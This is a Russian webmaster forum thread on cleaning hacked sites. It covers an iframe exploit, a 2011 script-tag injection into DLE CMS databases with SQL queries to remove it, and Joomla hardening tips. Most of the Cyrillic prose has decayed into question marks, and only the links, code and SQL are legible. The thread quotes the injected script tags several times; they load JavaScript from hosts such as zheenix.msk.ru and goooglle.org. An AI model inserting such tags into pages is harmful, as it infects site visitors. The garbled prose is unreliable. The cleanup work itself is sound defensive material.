FAQ   •  Поиск
Вход  •  Регистрация
 
????? ?? ?????

 
Начать новую тему   Ответить на тему    Список форумов newssoft.ru -> ????????? ???????
Предыдущая тема :: Следующая тема  
Автор Сообщение
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Вт Янв 06, 2009 11:47 pm    Заголовок сообщения: ????? ?? ????? Ответить с цитатой

???????? ???? ? http://forum.ruweb.net/viewthread.php?tid=2007
=====================================
<iframe> ??? ? ???? ?? ????? ?????!

? ????????? ????? ?????????? ?????? ????????? ? ?????? ????????? ?? ??????? ???????. ????????????, ?????? ?? ???? ???? ????????????:
1. ?????????? ??? ????? ???????? (??? ???? ????? ???????????? ??? <iframe> )
2. ????????? ???????? ?? ??????? ?????? ?? ?????? ????????
3. ?? ???????????? ??????, ?????? ???????? ??? ???? (?????? ????????? ???? ??????? ?????, ???? ??????????? ???????? ??? ? php ???? ? ?? ?????? ????????????? ?????? ??????????????)

?????? ???????? ???????? ????, ??? ??? ??????????.
?? ??????????? ???????????? ??????????? Microsoft (? ? ??????????? ??????? ???????????? ?????????? ?????? ? ????????? ????? ????????????? ??) ??? ????? ???????? ????????
????????* ,
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=78107
code:


Exploit.HTML.Iframe.FileDownload

??????????? ???????? ????????? Microsoft 29 ????? 2001 ?.


*???????? ?? ?????? ?????????? ????????? ??? ??????, ?????? ?????? ??????????? ? ???????? ????? ?? ????? http://www.microsoft.com

?? ?? ??? ???????????? ????????? ?? ????????? ???????? ???????????.
??????? ?????????? ????? ??????? ?????? ??? ??????? ???? ? ????? ?????????? ??, ???? ???? ?? ?????, ?????????? ?? ???? ????????? (? ??????????? ?? ?????????????) ?????? ?????, ???? ????? ?????, ??????? ?????? ???? ??????.

???????? ?????
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=147349

?????? ?? ???????? webmoney, ??????-??????, ftp ???????? ????? ?????? ? ??? ????? ??????????? ?????? ?????????????? ? ? ???? ?????????? ???? ?? ?????? ?? ????? ????? ????????? ??? ??????????? ????????? (??????????? ? ????? ???????? ???? ???????), ? ? ???? ? ???????? ?????? ???? ????. ????????? ????????-???????????? ????? ??????, ???? ??????? ??????, ?? ??????????? ??????????. ? ???? ???????????? ???? ?????????? ?????? ?? backup, ?? ????? ?? ??????????? ?????? ???, ???????????, ?????? ?? ???????.
http://mastertalk.ru/topic25547.html
http://forum.drweb.com/viewtopic.php?t=4406


??????????? ???????....
[update 21 ??? 2007]
????????? ?????? ?????????? ?????? ??????? ?? ????? ????????, ???????? ????? ????????:
code:
<script>document.write(unescape(


??? ???????
1. ?????? ????? ????????? ???? ????????? ?? ????????? "??????", ????????, ????????? ????????? ?? ??????? ????????????. ? ??????????? ??????? ??? ???????? ????????? ?????????????? ???????, ??? ??? ????????? ??????? ?? ??? ????????? ????? ????? ?? ????? ???????, ??? ??????? ??? ?? ?????????.
2. ????????? ??? ???????? (??????-????) ?? ???? ???????????? ???????, ????????? ?????????? windo?s ????????? ???????? microsoft ?? ???????? ???????.
3. ??????? ??? ???? ??????, ? ??? ????? ? ?? ???????? ????? ?? ?????????? ?????????. ??????, ?????????? ??? ??????? ? ????? ???????, ?????? ?? ???? ???????????
http://forum.ruweb.net/viewthread.php?tid=1829
4. ???????????? ??????: ????????????? ftp ?????? ? ?????. ?????? ??? ??? ????????, ??? proftpd:
http://www.proftpd.org/localsite/Userguide/linked/x1021.html
????????, ????????, ???????? ?????????? ????????????
http://site-helper.ru/uploading.html#filemanager
???? .ftpaccess
? ????? ???????????
quote:

<Limit>
DenyAll
</Limit>

???? ?? ???? ?????? ???????????, ??? ? ????? ????, ????????, ????????? ?? ??????????, ? ?? ???? ????????? ???????? ?? ??????? ??????, ?? ?????? ????????? ?????? ? ????????? ????????? ???????, ???????? ???
quote:

<Limit>
Allow 192.168.0.1/32
DenyAll
</Limit>


??? ?? ?????????? ? ??? ????????? ????????
* ???????? ???? ?? ????? ?????? ?? ????????? ?????? sanet.nnov.ru 25.10.2007

?????? ????????? ????????? ???????? ???????? ?? ????????? ??? ? ?????, ?????? ????????? - ????????????? ??? ?????? ??????????? ??? ? ?????????? ???????????. ??????? ??????? ??????????, ???? ????????? ????????????, ??????? ????, ?? ?????? ?? ??????????? ????????????. ??????????, ????????? ???????????? ???? ???????. ? ??????:

1. ????? ? ??????? ????????? ??????? ???????. ??? ?????? ? ???????? ? ??????? ??????????????? ??????????? ??????? ????????? ??????? ?????? ??? ???? ??????????????. ???? ?? ?????????? ????? ?????? ??????????.
2. ????????? ??????????? ????? ?????? ?? ????????? ? ??????????? ??????????. ???? ???????? ?????-?? ????? ????????? - ????? ????? Google ??????????? ???? ? ??????? ??????. ?? ? ???? ???? ?? ? ?????????, ??? ????? ???????, ???? ???? ??? ?????? ???????. ???? ?? ??????? ?? ?????? ????? - ????????, ????????? ???? ????, ????????? ?????? ???????????. ???? ???????? ?????? ? ??????????.
3. ????? ???????????? ?????????????? ???????, Mozilla ??? Opera. ???????? ????????? porno, warez, ?????? ? ??? ? ???. ?????? ? ??? ?? ??????, ?? ?????? ?? ????.
4. ????????? ????????? ????? ?????? ??????? ? ???????? ? ?? ???? ??? ??? ? 3 ???? ??? ???????? ?????????. ????? ????.
5. ???????????? ?????-???? ???????????? ???????????. ???????? http://www.gentlesecurity.com/ - ?????????? ???????? ?????? ??????.

???? ???-???? ??????????, ?? ???????? ????????? ???????. ??????????? ? ?????? ?????????? ?????? (?????? ????? ?????, ??? Dr.Web, AVG, NOD32, McAfee ???????? ????? ????????????, ???? ???? ????????? ?????????? ?????. Kaspersky, Symantec ????????? ?????????? ?????????? ??????. Panda - ??????). ?????????, ??? ?????????? ??? ?????? ???????. ????? ??????? ???? ???????????, ???? ?? ????????? ?????? ???? ?? ???????????.

1. ????????????? ? ?????????? ?????. ?????/??????? ????????.
2. ????????????? ? ??????? ?????. ????????? ???????.
3. ????????????? ????? ? ?????????? ?????. ???? ??????? ????? ???? - oops. ???? ?? ????? ??????? ???????, ?? ??????????? ????.
4. ?????????? ?????? ????????, ????? ?????????????:
http://www.online-solutions.ru/osam_autorun.php
5. ??? ????? ??????????? ????????????? - AVZ ( http://www.z-oleg.com/secur/avz/ ). ??????????? ???????? AVZGuard.
6. ?? ????????? ??????? ????????? c:\windows\system32\drivers\etc\hosts - ??????? ?????? ??????.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Чт Фев 03, 2011 2:34 pm    Заголовок сообщения: DLE Ответить с цитатой

???????? ???? ?????
http://zloyweb.ru/zacon/758-zheenix-nanosit-udar-po-dle.html

????? ????? ?????????? ??????? ?????? 2011 ???? ??????? ?? ??????? ?????:
?????????? ???????????? ???? ????? ???????? ? ????????? ?????????? ???????? ???????????, ????????????? ??? ??? ?????? ????????????, ? ????? ? ????? ??? ????? ??????.

? ????????? ?????? ???? ????????? ? ??????????? ?????? ? ???????? «???? ???? ????? ???????? ???????????? ?????? ??????????».

??????????, ??????? ??????????? ???. ???? ??? ????? ???????? ??? ?? ???????????, ??????? ? ??????????? ?????? ????? ?????. ??? ???? ????? ????? ??????? ??? ????? ???????, ????? ????? ???????? ???? ?? ?????? ????????? ???????????? ?????.


?????? ???? ??????? ? ??????? ?????:
????????????!

??? ????????? ?????? ????? ???????????? ????? ??????? ????????? ??????????? ??? ?????????? ??????????:


[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]


????????? ? ?????? ????????? ?? ????????? ?????????? ????????, ?????? ? ????? ???????? ?? ????????? ?????????? ???????????? ????.

???????? ?????? ???????????? ??????????? ?? ????????? ?????, ??? ???? ????? ???????? ????? ?????????????. ??????????, ????????? ???????? ?????? ????? ? ??????? ??????????? ???. ?????? ????? ????? ??? ????? ???????????? ???? ?, ???? ??????????? ??? ????? ?? ????? ?????????, ??????? ? ?????? ????????. ???????? ?????????? ??????? ????? ?????? ? ??????.?????????? ( http://webmaster.yandex.ru ).

---
? ?????????, ?????? ?????
?????? ????????? ???????

?????? ???? ?? Dle ????? ? ??????? ??? ???? ????? ?? ???????? ?? ???? ?????? DLE:
"????? ? ???? ??????, ? ?? ? ??????, ? ??????? ??????????????? ????????? ?????? ????????????"

? ?????? ????? ???????? ??????:
????????? ???? ? ???????????? ???????:

????????: ????????????? ?????????? ???????? ??????.

?????? ? ??????: 9.0 ? ??? ????? ?????? ??????

??????? ?????????: ???????

??? ??????????? ???????? ????? engine/modules/search.php ? engine/modules/fullsearch.php ? ???????:
$count_result = 0;

???? ????????:
$sql_count = "";

???????? ???? engine/inc/templates.php ? ???????:
$allow_save = false;

???? ????????:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );


???? ?????? ???????? ? ?????????? ?? ???? ?????? ???? ??? ?????? 9.0: http://dle-news.ru/files/dle90_path.zip, ????????? ??? ????? ?????? ?????? ???????, ???????? ???????, ??? ??????? ????.


2. ????????? ?????? ??? ????? ?? ?? (?????? SQL ????)
??? ????? ?? ????:
Код:
[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]

[quote] ? ??? ? ??????? ? ?????? ??????? ?? ?????? DLE ?????????? ???????.
??? ????? ?? ?????. ??? ??????? ????? ?? ????? ??

<script src="h**p://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="**p://zheenix.msk.ru/abc.js" type="text/javascript"></script><script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js


????? ?? ??? ???????? ?? ?????

1.
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>


2.
<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>


3.
<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

4. script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
5. script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
1 ??? ??????? ????? ??????? ?.? ??? ????? ????? ????? ??????, ??????? ?????? ?? 2 ? 3!

???? ? phpmyadmin, ???????? ??????? SQL, ????? ?????? ? ???? ?????????:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'


???????? ??, ????? ???? ???????? ?? ???????? ?????? ?2!

?? ???????? SQL ??????? ??? ?? ?????? ?3 ?????? ????????? ????? sql ??????:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'


???????? ??!

?????? ?3 ??? ?? ??????!

?????? ????????? ?? ?????? ?1

? phpmyadmin ???????? ??????? "???????" ? ???????? ??, ????????? ?? ?????????!
????????? ??? ???? ? ??????? Microsoft Word, ???????? "??????"---"?????" ---"????????" ? ????????? ? ???? ?????: (zheenix)*(js) ? ? ???? ?????? ????????? zheenix.ru , ??? ?? ???????? "??????" ? ?????? ??????? ?? "?????????????? ?????" , ???????? "???????? ???"!
???? ?? ?????????? ?? ??????? ????! ????????? ?????????!
???? ? phpmyadmin ---> ????????? ----> ? ???????? ??? ??????? ---> ????? ??????? ???!
?????? ???? ?? ??????? "??????" , ???????? ????? ? ???????? ???? ?????????? ??, ?????? ?????? utf8 ---> cp1251 ? ????????? ??! ???? ?????????!

?????? ????? ???? ?? ??????? SQL ? ????????? ????? ??????:

Код:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'



???????? ??!
??? ?????????? ? ???!
?? ?? ??? ????????? 2 ??????? 4 ? 5
Код:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'




UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'



??????????: ????????? ????????? ???? SQL ???? ? ??????? Microsoft Word, ???????? "??????"---"?????" ---"????????" ? ????????? ? ???? ?????: (zheenix)*(js) ? ? ???? ?????? ????????? zheenix.ru , ??? ?? ???????? "??????" ? ?????? ??????? ?? "?????????????? ?????" , ???????? "???????? ???"!

?? ? ?? ???-???? ??????? ?????? ? ???????, ???, SQL, ??????? ?????? ? ???????????? ?????? DLE -?????? ?? ?????????? ?????? ?????????!!!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Вс Фев 13, 2011 2:21 pm    Заголовок сообщения: Ответить с цитатой

http://zloyweb.ru/zacon/758-zheenix-nanosit-udar-po-dle.html

http://www.bormotuhi.net/showthread.php?t=11279
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Вт Апр 12, 2011 11:38 am    Заголовок сообщения: Ответить с цитатой

?????? Bredolab
http://www.securelist.com/ru/analysis/208050672/Botnet_Bredolab_Konets_istorii
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Сб Авг 20, 2011 8:35 pm    Заголовок сообщения: Ответить с цитатой

????? ????? ???? ???????? ?????
http://habrahabr.ru/company/sprinthost/blog/125839/#habracut
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Ср Авг 31, 2011 10:36 am    Заголовок сообщения: Ответить с цитатой

http://blakeembrey.com/2011/08/25/warning-somethings-not-right-here/
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Чт Сен 29, 2011 11:42 am    Заголовок сообщения: Ответить с цитатой

http://www.securelist.com/ru/analysis/208050672/Botnet_Bredolab_Konets_istorii

??? ???? ????? ??????????? ???? ?? ????????? ???? ?????, ?????????? ?????????????? ????????? ???????????? ?? ?????? ???????????????? ??????????? ? ???-??????.

?????? ???????????????? ???????????
?????????? ???????????? ????????????? ?????????? ? ??? ???????????? ???????, ? ??? ???????? ????????? ?????????????, ??? ??? ??????????? ?????????? ? ?????? ?????????? ?????????? ? ??, ??????? ??? ??????? ? ??????????? ??????? ??????????????? ?????????. b??????????, ???? ?????????? ???????????? ?? ? ???????????? ???????????? ???? ? ?????????? ?????????. ????????? ???? ? ?? ???????, ?? ???????? ??????????? ??????? ???? ????????? ??????????.
?? ? ???????, ?? ????? ????????? ?? ??????? ? ???????? ???????, ? ?????????? ?? ?????????? ????? ? ?????????? ????? ? ?????????? ??????????? ?????? ???????????. ???, ??? ?????????, ??? ????????????.

?????? ??????
??? ????????? ???-????? ????? ???? ???????????? ?????????? ? ???? ?????. ??? ???? ????? ?????? ? ???????? ??????????? ????????????? ???????????????? ???????????, ?????????? ??????? ?? ???????? ?????????? ?? ? ???????????? ????????? ??????????? ??????????? ?????.
??????? ??????? ? ????????????? ???????? ? ?????? ???????????? ?????? ??? ??????????? ???????????? ????, ? ????? ???????????????????? ????????? ????????.
? ????? ???????????? ????? ????????? ?????????????? ?????????? ftp-??????? ? ftp-???????? (????????, ??? ?????? ?????????, ???????? ?????? ?? ftp-?????????, ? ????????? ???????????? Bredolab Trojan-PSW.Win32.Agent.qgg, ???? ?? ?????????? ?????????? ?????? ??????????? ??????).
????? ????????? ???????? ???????????? ?????? ????????? ????? ????? (??? ??????, ??????, ? ??????? ????? ????????? ?????? ??????) ?? ??????, ???? ? ?????????? ????????? ?????? ???????? ????????????.
???? ???? ???-???? ???????? ???????, ???????? ???????? ???????????? ???? ? ????? ????? ???? ????????????. ????????, ???? ???? ???????? ?????? ??? ftp, ?? ????? ????????? ????? ???? ????? ???? ????? ???????. ??? ?????????? ???????? ????? ????????? ????????? ????:
????????? ??????? ?????????? ??? ??, ?????????????? ?? ?????, ? ????????? ?? (????? ????????? ????????? ????? ????? ??????????).
????????? ???????????? ??????? ? ?????? ??????? ????????????? ??????, ???????? ?????? ???????????? ???????????????? ???????????, ? ??????? ???? ?????? ? ftp ?????.
??????? ?????? ? ftp-????????.
???????? ???? ?? ???????????? ????.

?????? ??????????? ???? ?????????????, ????? ??????????? ??????? ???? ????, ??? ???? ???????????? ??????? ???????? ?????? ??????-?????? ???????. ?? ?????????, ??? ????????? ????? ????????????, ??? ????????.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Пт Апр 13, 2012 5:58 pm    Заголовок сообщения: Ответить с цитатой

Код:
http://joofaq.ru/problemi-s-joomla-i-rasshireniyami/bezopasnost-sayta/zaschita-ot-vzloma-sayta-na-joomla-osnovnie-metodi-vzloma

?????? ?? ?????? ????? ?? Joomla. ???????? ?????? ??????
???????? ???? ?
[url]http://joofaq.ru/problemi-s-joomla-i-rasshireniyami/bezopasnost-sayta/
zaschita-ot-vzloma-sayta-na-joomla-osnovnie-metodi-vzloma[/url]


???????? ?????? ?????? ????? ?? Joomla ? ??? ???????????
????? - ???? ?? ????? ???????. ??? ????????? ?? ??? ?????????, ????? ????????? ??? ?? ??????? FTP ????????? ??? TotalCommandera. ? ???? ?????????? ???????? ???? ?????? ? ?????? ????????, ??????? ?????? ???????? ??????????????. ????? ????? ??????????, ????? ???????? ????. ????? ??????? ???? ????? ????????? ??????, ??? ?? ???????? ???????? ??? ???? ????? ?????? ?????! ??????????? ????????? ?????? - ? ??? ????? ??????????? iframe ? ??????????? ?????, ????????? JS ??????? ??? ?????? ?? ?????? ????? ? ?.?.. ????? ????? ?? ??? ???? ?????? ???????? ??? ?????????? ? ????????? ???????.
SQL ???????? - ???????? ???????????????? ?????? ??????. ??????? ?? ????????? ??????? ? ?????? ???? ??????. ? ???? ??????, ?? ? ?????? ? ?????? ??????????????. ????? ??????? ????????????? ????? ?? ?????? ??????? ??? ???? ? ?????? ??? ?????? ??????, ?? ? ???????? ?? ??? ???? ?????. ??????????? SQL ???????? - ????? ?????? Joomla ? ???????????????? ?????? ?????. ??? ?? ????????????? ????? ?????? ??????? ??? ?????????? ?????? ?????.
?????????????? ?????? ?????????????? - ? ????????? ????? ????? ?? Joomla ??? ???? ???????? ???????? ?????? ???? ????????. ???? ???? ? ??? ?? ????? ????? ????????? ????????? ???, ????? ??? ????? ????????? ? ???????? ?????? ????? ???: ???_????/index.php?option=com_user&view=reset ? ??? ????????? ?????? ??? ?????????????? ??????. ?????? ?????? ???? ??????????? ??? ? ???????? ??? ??????. ??????????? ?????? ?????? ?????????????? - ?????, ??? ? ??? ??? ???????. ?????? ?????? ?????????????? ? ???????????????? ?????? ?????? ?????. ?????? ???????????, ??? ????? ??????? , ? ???????, ??? ??????????
????? "???????" ?????????? - ????? ????? ????? ????? ? ????????? ???????????, ????????? ???? ??????? POST ?? ???????????? ????????. ??????????? ?????? ????? ????? ? ??????????? - ? ????? ? ???????????, ??????? ????????, ????? ?????? ????? "?????" ??????. ????? ????? ?????? ????? ??????????? ??????. ? ????????? ??????? ???? ????? ???????? ?? ??, ??? ?? ????? ?????.
PHP ???????? - ????????? ???????????? ???? ????? ?????? ???????.
XSS ??? ??????????? ????????? - ????????? ?? ????? ????????? ???????? ???????, ? ??????? ?????????? "?????????" ??????. ??? ????? ??? ?? ????? ????????? ??-?? ?????? ???????. ????????, ???? ? ???? ?? ??????? ????????? ?????????? ?????? ??? ????, ?? ?? ??? ?? ?????????? ?????????.
?????? ? ???????????? ????? Joomla ?? ??????


?????????? ??????? ???????????? ??????????? ???????????. ?? ????? ????? ????? ??? ????????? ????????? ?????????? ???? ???????.


?? ?????????? ?????????? ? ????????????? ?????????? ? ?????????? ?? ???????????? ???????? (????????? ??? ??????????). ?, ????????, ??????? ?????? ?????-?? ?????? ??? ???????????? ? ????????? ?? ??? ????? ?????? ?? ?????? ?????. ????? ????? ??? ???????, ????? ?????? ?? ?????? ?? ????? ?????-????????, ? ?????? ??? ? ??????????? ??????????. ?? ???? ?? ?? ??????? ???-?? ? ????????? ?????, ?? ????? ?????????? ??????? ????????? ??????????? ?? ??????? ?????????, ??????????? ????? ?????????? ?? ??????? "?????" ??????. ?? ?????????? ????????????? ?????????? ??????? ?? ??????? ????, ??????? ????? ????????? ?? ?????-?????? ????-????? ?? ????????? ????????. ? ?????, ?????????? ??? ??? ? ???????, ??????? ?? ???????.


??????????? ??????? ????????? ????? ????? ? ???? ??????. ??? ????? ????? ???????????? ????????? ?????????? ??????????? JoomlaPack. ??? ??????? ??? ?????????? ?? ?????? ?? ???????, ?? ? ?? ????? ??????????? ??????. ? ????? ????????? ????? ????? ??????? ????????? ?? ????? (??????? ?????? - ??????????!). ?????? ?? ????????? ??????? ???? ?????? ?? ?????????, ? ?? ?????? ????? ??? ?????? ??????? ? ???????.


??? ????, ????? ???????? ???? ???? ?? ???? ???????, ????? ???????????? SEF ?????????? ??? ????????? ?????????????? ??????. ????? ???????????? ??????????? SEF ???, ? ???????, ARTIO JoomSEF. ???? ? ???, ??? Joomla ?? ?????? ?????????? ??????, ? ??? ???????? ??? ???: http://localhost/sayt/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=3. ? ????? ????? ?????? ????? ? ?????? "com_content" (???? ? ??? ???? "?????") ??? ?????? ???????? ?????????? ? ??? ????????? ?????? ??????, ? ??????? ?????? ???? ? ??.


????? ????? ????? ?????? ??????, ????? CMS ?? ???????????. ????? ???? ????????? ?????? ????? ? ???? ?????? ?????? ????? ?????????. ??? ????? ?????????? ??????? ?? ???? ?????? ????? ???????:
 <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

???????? ?? ???? ???? (??? ???????????? ? ????? ????? FTP ?????? FileZilla?) ? ????? ?? ????? ???? ???_????/libraries/joomla/document/html/renderer/. ? ???? ????? ???????? ???? head.php ? ?????????? ???, ????????, ?????????. ? ??????? ?????? ????? ??? ??????:

$strHtml .= $tab.'<meta name="generator" content="'.$document->getGenerator().'" />'.$lnEnd;

??????? ?? ? ?????????? ???? ??????? ?? ????. ?????? ? ??? ??? ????? ?? ???? ?????? ?????? ???? ??????.


?????????? ?????? plgSystemJSecure. ????????? ???? ??????, ????????????? ?? ?????? ???? ??????? ???? ???????????????? ??????, ????? ?????? ???_????/administrator. ??? ??? ? ???? ??????? ????? ????? ?????? ??????? ?????. ????? ????, ??? ?? ??? ???????, ?????? ?? ?????-?????? ?????? ????? ????? ????????? ???: ???_????/administrator/?????_???????_?????. ??? ?????????? ??????? ?????? ??????? Joomla.


????? ?????? ?????? ????? ????? ?????? ???????????? ???? ??????????. ??? ?????????? ??, ??????? ??? ?????. ???????????? ????? ????????? ?????????? ????? ?????????, ??? ?????? ????? ??????? ? ??? ?????-?????? ??????.


??? ?????????????? ??????????, ??????, ???????, ??????? ? ?????? ????? ??????? ?????????! ???? ???? ?????? ?????????? ?????????. ????????, ?? ?????-?? ?????????? ?????? ????? ??????????. ???? ? ??? ????? ?????? ???? ?????????, ? ?? ?? ???? ?? ??????????? ?, ???????????, ?? ????????? ??? (????? ?? ???? ? ????????), ?? ??? ??? ????? ?? ?????? ??? ?? ?????. ??? ??? ????? ??????? ??? ?????????. ?????????? ?????? ????? ??????????? ? ?? ??????? ??? ?????? ??? ????????? ?????? ?? ??????? ????.


??? ????, ????? ?????? ?? ?????, ????? ?????? ????????? ?????????? ??????????? (?????? ????????? ??????????? ? ??????????? ?? "?????"), ????? ??????? ?????? ?????? ???? ????????? ??????????. ??? ????? ???????? ???? ?? ????????? ??? ????????? ??????????, ??????, ??????? ? ??????? ? ??????? FTP ????????? FileZilla ??? ??????? ??????? ? ? ??????? ?????? ?????????? ????????? ??????? ? ???? ?????? ????? ?????????? ? ??????? ??????????.


???? ?? ?? ??????????? ?? ????? ????? ?????? ??????????? ????????????? (? ???? ??? ???? ????, ??????), ?? ????? ??????? ?????, ??????? ???????? ?? ?????????????? ?????? ? ??? ?????. ????? ??????? ??? ??? ????? com_user (??????? ????????? ?? ???? ???_????/components) ??? ????????? ????, ?????????? ?? ????? - reset.php. ???? ???? ????????? ?? ???? ???_????/components/com_user/models.


??? ?????? ? SQL ?????????? ???? ??? ???????? ???????. ?????? - ??? ????????? ?????????? jFireWall (??????? ? ???????? ?????? ?????????, ???? ?????????? ?????? jFireWall Lite). ?????? - ??? ????? ???????? ? ???????? ? ???? ??????. ?????? ?????? ? ????? ???????????, ??? ??? ????????? ????? ???????? ????? ???????? ??? ??????????? ?? ???? SQL ????????. ??????? ?????????? ??? ????????? ???? ? ????? ?????????? joomla, ??? ??? ?? ??? ????? ?????? ?? ????? ?? ????????? ????? ? ??????????? ??????? ????????? ????? ????? ? ???? ??????. ? ?????? ??????? ?? ???????:

- ???????? ? ?????? ?????? ?????? ?????, ?????????? ? ????? ?????????/??????. ? ?????? ????? ?????? ????? "??????? ???? ??????", ??? ????? ???????? faqj_. ????????? ??? ?? ????? ???????, ????????, ?? asd_ ? ??????????;

